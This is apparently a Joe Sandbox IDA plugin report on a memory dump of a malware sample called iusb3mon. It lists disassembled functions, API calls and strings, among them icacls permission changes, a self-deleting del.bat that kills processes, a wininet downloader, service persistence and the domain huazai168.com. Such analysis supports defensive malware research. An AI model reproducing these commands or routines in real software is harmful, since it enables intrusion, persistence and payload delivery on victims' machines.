Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadwsprintf
String ID: %$C$C$Console$E$M$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
API String ID: 1476185493-1609218977
Opcode ID: 41d340fb522dfcb0a798869072cea2887f77ac109e94c2ba18c919d04bd33241
Instruction ID: 611b8e5638f36f1ce9636ed4fa146f0beefa2052039d2305d6e184e7f2df2256
Opcode Fuzzy Hash: 41d340fb522dfcb0a798869072cea2887f77ac109e94c2ba18c919d04bd33241
Instruction Fuzzy Hash: E331BF50D0C6C9DDEF02C6A888487DFBEB55B26349F084098D6943A292C6FF575887BA

Function 06293DF2 Relevance: 56.1, APIs: 24, Strings: 8, Instructions: 142threadprocesssleepCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 06293E0C
WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06293E14
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06293E1B

Part of subcall function 06292A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06292661,c:\inst.ini), ref: 06292A2B
Part of subcall function 06292A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06292661,c:\inst.ini), ref: 06292A40
Part of subcall function 06292A15: CloseHandle.KERNEL32(00000000,?,06292661,c:\inst.ini), ref: 06292A4D

Sleep.KERNEL32(c:\del,?,?), ref: 06293E38

Part of subcall function 062929CE: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,76230F00,?,06293E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062929E4
Part of subcall function 062929CE: WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,06293E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062929FC
Part of subcall function 062929CE: CloseHandle.KERNEL32(00000000,?,06293E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06292A09

Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06293E4B
WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 06293E53
Sleep.KERNEL32(000003E8,?,?), ref: 06293E5A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 06293E6A
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 06293E83
GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 06293E9A
SetFileAttributesA.KERNEL32(?,00000080,?,?), ref: 06293EB7
GetCurrentProcess.KERNEL32(00000100,?,?,?,?,?,?,?,?), ref: 06293F32
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06293F3F
GetCurrentThread.KERNEL32 ref: 06293F43
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06293F50
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 06293F69
SetPriorityClass.KERNEL32(?,00000040,?,?,?,?,?,?,?,?), ref: 06293F78
SetThreadPriority.KERNEL32(?,000000F1,?,?,?,?,?,?,?,?), ref: 06293F7F
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 06293F84
GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?), ref: 06293F94
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06293F9B
GetCurrentThread.KERNEL32 ref: 06293F9E
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06293FA5
ExitProcess.KERNEL32 ref: 06293FA8

Strings

/c ping -n 2 127.0.0.1 > nul && del , xrefs: 06293EC3
cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone", xrefs: 06293E07
c:\del, xrefs: 06293E21
cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone", xrefs: 06293E0F
COMSPEC, xrefs: 06293E95
D, xrefs: 06293F20
C:\ProgramData\Microsoft\del.bat, xrefs: 06293E16, 06293E3A, 06293E4E
> nul, xrefs: 06293EE7

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$PriorityThread$CurrentProcess$ClassCreateExecSleep$CloseHandleNameWrite$AttributesDeleteEnvironmentExitModulePathResumeShortVariable
String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$C:\ProgramData\Microsoft\del.bat$COMSPEC$D$c:\del$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone"
API String ID: 1606893727-1022896001
Opcode ID: 9323c493ba72f236c8f3cd2f6458958e6d4d2933daf75e255eb6f0a7c80d5e43
Instruction ID: b2cd56fce3e2ef0b58cb661c0804f26de98ff7a5fb638e24bd7b359b48eea5e5
Opcode Fuzzy Hash: 9323c493ba72f236c8f3cd2f6458958e6d4d2933daf75e255eb6f0a7c80d5e43
Instruction Fuzzy Hash: 6B417A72950319BBEBA0ABE1EC8DEDF7B6CEF84740F010455FA54A2080DAB09A458F75

Function 0629510D Relevance: 54.5, APIs: 23, Strings: 8, Instructions: 287registrystringsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06295112
wsprintfA.USER32 ref: 06295148
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 0629515A
GetLastError.KERNEL32 ref: 06295166
ReleaseMutex.KERNEL32(00000000), ref: 06295174
CloseHandle.KERNEL32(00000000), ref: 0629517B
RegOpenKeyExA.ADVAPI32(80000001,Console,00000000,00020019,?), ref: 062951D2
RegQueryValueExA.ADVAPI32(?,Groupfenzhu,00000000,?,00000000,?), ref: 062951F3
RegCloseKey.ADVAPI32(?), ref: 06295210
RegQueryValueExA.ADVAPI32(?,Remarkbeizhu,00000000,?,00000000,?), ref: 06295228
RegCloseKey.ADVAPI32(?), ref: 06295245
RegQueryValueExA.ADVAPI32(?,MarkTime,00000000,?,00000000,?), ref: 0629525D
RegCloseKey.ADVAPI32(?), ref: 0629526D
_rand.LIBCMT ref: 06295288
Sleep.KERNEL32(00000BB8), ref: 06295292
lstrcatA.KERNEL32(?,?), ref: 06295347
lstrcatA.KERNEL32(00000000,huazai168.com), ref: 06295370
strcmp.MSVCRT ref: 06295382
GetTickCount.KERNEL32 ref: 06295397
GetTickCount.KERNEL32 ref: 062953B3
lstrcpyA.KERNEL32(062C2AD4,?,?,?,00006365,00000000), ref: 062953ED
WaitForSingleObject.KERNEL32(?,00000064,?), ref: 0629543F
Sleep.KERNEL32(000001F4), ref: 0629544C

Strings

Default, xrefs: 062951F9
Remarkbeizhu, xrefs: 06295220
Groupfenzhu, xrefs: 062951E8
%s:%d:%s, xrefs: 06295142
huazai168.com, xrefs: 0629513D, 0629536A
Console, xrefs: 062951C8
MarkTime, xrefs: 06295255
SYSTEM\CurrentControlSet\Services\, xrefs: 06295198

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$CountMutexSleepTicklstrcat$CreateErrorH_prologHandleLastObjectOpenReleaseSingleWait_randlstrcpystrcmpwsprintf
String ID: %s:%d:%s$Console$Default$Groupfenzhu$MarkTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\$huazai168.com
API String ID: 2892932112-1296324176
Opcode ID: 77092b91fa999a7c9bb27815dea5202588420c9d99b4973ecab97ec30c685e20
Instruction ID: c27f1679fbf56f214d1dfa0a7e762a7050f818e9c1494c653aa63a9f79eb8579
Opcode Fuzzy Hash: 77092b91fa999a7c9bb27815dea5202588420c9d99b4973ecab97ec30c685e20
Instruction Fuzzy Hash: F0A1A172E2021AABDFA2DBB0DD48AEE7B7DEF44350F104565EA09B2040DB749A45CF71

Function 06294FA7 Relevance: 43.8, APIs: 3, Strings: 22, Instructions: 81stringtimeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,75B4EA50), ref: 06294FB5
wsprintfA.USER32 ref: 06295056
lstrlenA.KERNEL32(?,00000000), ref: 0629508C

Part of subcall function 06299423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,062BCB7A,?,00000000,0629ADE0,062AE538,000000FF,?,062956BE,80000001,Console,Groupfenzhu,00000001,062BCB7A), ref: 06299450
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06299467
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06299472
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0629947D
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06299488
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06299493
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0629949E
Part of subcall function 06299423: FreeLibrary.KERNEL32(00000000,?,00000000,0629ADE0,062AE538,000000FF,?,062956BE,80000001,Console,Groupfenzhu,00000001), ref: 06299592

Strings

:, xrefs: 06295042
d, xrefs: 0629503E
%, xrefs: 06295046
MarkTime, xrefs: 0629509A, 0629509F
2, xrefs: 06295012
., xrefs: 0629500E
, xrefs: 0629502E
d, xrefs: 06295016
d, xrefs: 06295052
2, xrefs: 0629504E
Console, xrefs: 062950A0
2, xrefs: 0629503A
-, xrefs: 0629501A
., xrefs: 0629504A
., xrefs: 06295022
%4d-, xrefs: 06294FFF, 06295002
d, xrefs: 0629502A
2, xrefs: 06295026
%, xrefs: 0629501E
%, xrefs: 0629500A
., xrefs: 06295036
%, xrefs: 06295032

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadLocalTimelstrlenwsprintf
String ID: $%$%$%$%$%4d-$-$.$.$.$.$2$2$2$2$:$Console$MarkTime$d$d$d$d
API String ID: 1129135643-4086575212
Opcode ID: 190803c4128de10ff0607a1d493be9a8c235290f55f9d28f260b78cfd04186b6
Instruction ID: fa3cababd825516d93301b5e65c0b0caf7556529a2067e1c7a87a02d8b9f01f1
Opcode Fuzzy Hash: 190803c4128de10ff0607a1d493be9a8c235290f55f9d28f260b78cfd04186b6
Instruction Fuzzy Hash: 47410E61C083D8E9EB12C7E8D8087DEBFB95B15708F0840C9E584BA182D6FA4758C776

Function 06296316 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 169filelibraryloaderCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,062944DD,00000000,00000001), ref: 06296344
LoadLibraryA.KERNEL32(wininet.dll), ref: 06296357
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0629636E
InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0629638E
GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 0629639A
FreeLibrary.KERNEL32(00000000), ref: 062963BC
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 062963D9
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 06296409
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 06296496
CloseHandle.KERNEL32(?), ref: 062964A8
Sleep.KERNEL32(00000001), ref: 062964B3
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 062964BF
FreeLibrary.KERNEL32(00000000), ref: 062964D2
CopyFileA.KERNEL32(?,?,00000000), ref: 062964E3
CloseHandle.KERNEL32(?), ref: 062964F3
DeleteFileA.KERNEL32(?), ref: 06296500

Strings

InternetOpenUrlA, xrefs: 06296394
404, xrefs: 06296422
%s1, xrefs: 0629632F
InternetCloseHandle, xrefs: 062964B9
wininet.dll, xrefs: 0629634C
MSIE 6.0, xrefs: 06296374
InternetOpenA, xrefs: 06296365
InternetReadFile, xrefs: 06296401

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$AddressProc$Library$CloseDeleteFreeHandle$ConnectCopyCreateInternetLoadSleepWrite
String ID: %s1$404$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 1518507476-3861321592
Opcode ID: 0df5e4e44c1b1579512b01d5f9c9c49463ae09f80a470efc01a5b852c2fd4237
Instruction ID: 2713679d608602426ea07c7e7d1fcf5d65ee28b4627d73921c23a6e032648887
Opcode Fuzzy Hash: 0df5e4e44c1b1579512b01d5f9c9c49463ae09f80a470efc01a5b852c2fd4237
Instruction Fuzzy Hash: F45131B291021EBFEF509FA0DC89DEE7B7DEF44794F104466FA05A2050DA749E829F60

Function 06298FF7 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062939FA,SeShutdownPrivilege,00000001,?,0629200F,?), ref: 0629900F
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0629901F
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0629902A
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06299035
LoadLibraryA.KERNEL32(kernel32.dll,?,062939FA,SeShutdownPrivilege,00000001,?,0629200F,?), ref: 0629903F
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0629904A
LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06299092
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0629909A
CloseHandle.KERNEL32(?), ref: 062990A9
FreeLibrary.KERNEL32(00000000), ref: 062990BA
FreeLibrary.KERNEL32(00000000), ref: 062990C5

Strings

GetCurrentProcess, xrefs: 06299041
KERNEL32.dll, xrefs: 0629908D
kernel32.dll, xrefs: 06299037
AdjustTokenPrivileges, xrefs: 06299021
LookupPrivilegeValueA, xrefs: 0629902C
GetLastError, xrefs: 06299094
SeShutdownPrivilege, xrefs: 06298FFE
OpenProcessToken, xrefs: 06299019
ADVAPI32.dll, xrefs: 06299006

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$Free$CloseHandle
String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
API String ID: 2887716753-2040270271
Opcode ID: b0b8695de780ac69c8b7bf8d8ec23f9fd4461c5c838f803479a7d54d82b8962a
Instruction ID: 0cf91930127f7b14fcf7a2232b01d3220cbf2f2d11f14fe7b4e6872f4c94301c
Opcode Fuzzy Hash: b0b8695de780ac69c8b7bf8d8ec23f9fd4461c5c838f803479a7d54d82b8962a
Instruction Fuzzy Hash: BB218B71D1031ABADF00ABF58C89EEFBFB8EF48390F054415E940A2040EAB49A41CFA1

Function 062958AD Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 116sleepregistryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(062BCA80,062959C2), ref: 062958C3
SetServiceStatus.ADVAPI32(00000000,062C3118), ref: 06295913
Sleep.KERNEL32(000001F4), ref: 06295921
GetVersionExA.KERNEL32(?), ref: 06295938
SetServiceStatus.ADVAPI32(062C3118), ref: 06295958

Part of subcall function 0629571E: CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,huazai168.com,062BCC34,06296CAB), ref: 06295729
Part of subcall function 0629571E: GetLastError.KERNEL32 ref: 06295731
Part of subcall function 0629571E: CloseHandle.KERNEL32(00000000), ref: 0629573F

Sleep.KERNEL32(0000003C), ref: 06295961
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06295977
wsprintfA.USER32 ref: 06295990
CloseHandle.KERNEL32(00000000), ref: 062959A6
SetServiceStatus.ADVAPI32(062C3118), ref: 062959B9
SetServiceStatus.ADVAPI32(062C3118,062C3118,75B504E0,00000001,00000000), ref: 062959FF
Sleep.KERNEL32(000001F4), ref: 06295A06
SetServiceStatus.ADVAPI32(062C3118), ref: 06295A20
SetServiceStatus.ADVAPI32(062C3118,062C3118,75B504E0,00000001,00000000), ref: 06295A43
Sleep.KERNEL32(000001F4), ref: 06295A4A
SetServiceStatus.ADVAPI32(062C3118,062C3118,75B504E0,00000001,00000000), ref: 06295A7E
Sleep.KERNEL32(000001F4), ref: 06295A85

Strings

%s Win7, xrefs: 0629598A

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Service$Status$Sleep$CloseHandle$CreateCtrlErrorFileHandlerLastModuleMutexNameRegisterVersionwsprintf
String ID: %s Win7
API String ID: 2853745164-511819196
Opcode ID: 225e1f41b1dce508057a25cb575a2e75d0428cb3fc8a08dac4901705b967798c
Instruction ID: d3c5a780898ba0c62547b6c9d26b7e29fbf5f47d077a735e5bde0ca0fe7b1462
Opcode Fuzzy Hash: 225e1f41b1dce508057a25cb575a2e75d0428cb3fc8a08dac4901705b967798c
Instruction Fuzzy Hash: A1418D70520305AFEB50EF6AFC4EB967BBAF745729F008409EB48A6180C7F94545CFA5

Function 062A956B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170stringCOMMON

Download Yara Rule

APIs

Part of subcall function 062AC82F: TlsGetValue.KERNEL32(00000000,?,00000100,062AC48E,062AC4D2,062A87DA,00000100,062A8773,?,?,00000100), ref: 062AC86E

CallNextHookEx.USER32(?,00000003,?,?), ref: 062A9595
GetClassLongA.USER32(?,000000E6), ref: 062A95DC
GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,?,062AC4D2), ref: 062A9608
lstrcmpiA.KERNEL32(?,ime), ref: 062A9617
GetWindowLongA.USER32(?,000000FC), ref: 062A968A
SetWindowLongA.USER32(?,000000FC,00000000), ref: 062A96AB

Strings

ime, xrefs: 062A9611
AfxOldWndProc423, xrefs: 062A96EC, 062A96F1, 062A96FC, 062A9704, 062A970D

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: 809210db13d276de00bc89997f0869ef32b2625f44017bb0691aa915218f703b
Instruction ID: bdf2dfd21bded51037b39ebcedfcfe0c540ce9204ce3c8a9dd99ac0b8adbd5da
Opcode Fuzzy Hash: 809210db13d276de00bc89997f0869ef32b2625f44017bb0691aa915218f703b
Instruction Fuzzy Hash: 3E51AE71E20326AFCB519F65DC48BAE3BA9FF04760F114614FE55AA290D7B0D981CFA0

Function 06299423 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 144libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,062BCB7A,?,00000000,0629ADE0,062AE538,000000FF,?,062956BE,80000001,Console,Groupfenzhu,00000001,062BCB7A), ref: 06299450
GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06299467
GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06299472
GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0629947D
GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06299488
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06299493
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0629949E
FreeLibrary.KERNEL32(00000000,?,00000000,0629ADE0,062AE538,000000FF,?,062956BE,80000001,Console,Groupfenzhu,00000001), ref: 06299592

Strings

RegDeleteValueA, xrefs: 06299482
RegCloseKey, xrefs: 06299498
RegDeleteKeyA, xrefs: 06299477
RegSetValueExA, xrefs: 0629946C
Console, xrefs: 06299445
RegOpenKeyExA, xrefs: 0629948D
RegCreateKeyExA, xrefs: 0629945B
ADVAPI32.dll, xrefs: 0629944B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: ADVAPI32.dll$Console$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
API String ID: 2449869053-4282833508
Opcode ID: 52b4660d1beb01b2c46a0cf610aa3560e53b192860464c0269092334b4f20921
Instruction ID: 7f1d17940eef03d2f824bb73181a8a7df77c5a6c7cee60f66998492334394d1b
Opcode Fuzzy Hash: 52b4660d1beb01b2c46a0cf610aa3560e53b192860464c0269092334b4f20921
Instruction Fuzzy Hash: B3412871D2021ABFEF519F95DC84DFEBB79EB887A1F04402AFE14A2150D7718D419B60

Function 062991B3 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 183libraryloaderstringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06299216
GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0629922E
GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0629923E
GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0629924E
GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0629925B
GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06299268
lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062993CF
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062993F3

Strings

RegCloseKey, xrefs: 0629925D
RegEnumKeyExA, xrefs: 06299250
RegEnumValueA, xrefs: 06299243
%08X, xrefs: 0629938F
RegQueryValueExA, xrefs: 06299222
RegOpenKeyExA, xrefs: 06299233
ADVAPI32.dll, xrefs: 06299211

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadlstrcpy
String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
API String ID: 2888591476-2913591164
Opcode ID: 5799657ad83b26e124b3d1e676cf8bebac94a09f01c57df6b00c53c7c61a6048
Instruction ID: 0601e48ec14ee6303d01a157ad19133ae7b2c3bbf39a4afe0f61c1d194f37716
Opcode Fuzzy Hash: 5799657ad83b26e124b3d1e676cf8bebac94a09f01c57df6b00c53c7c61a6048
Instruction Fuzzy Hash: 12611B71D2021EAFDF619FA4DC84AEEBBB8FF48350F04016AF919A2150D7719A91CF64

Function 06298ADE Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 174libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06298B17
GetProcAddress.KERNEL32(00000000,socket), ref: 06298B2C
GetProcAddress.KERNEL32(?,recv), ref: 06298B39
GetProcAddress.KERNEL32(?,connect), ref: 06298B46
GetProcAddress.KERNEL32(?,getsockname), ref: 06298B53
GetProcAddress.KERNEL32(?,select), ref: 06298B60
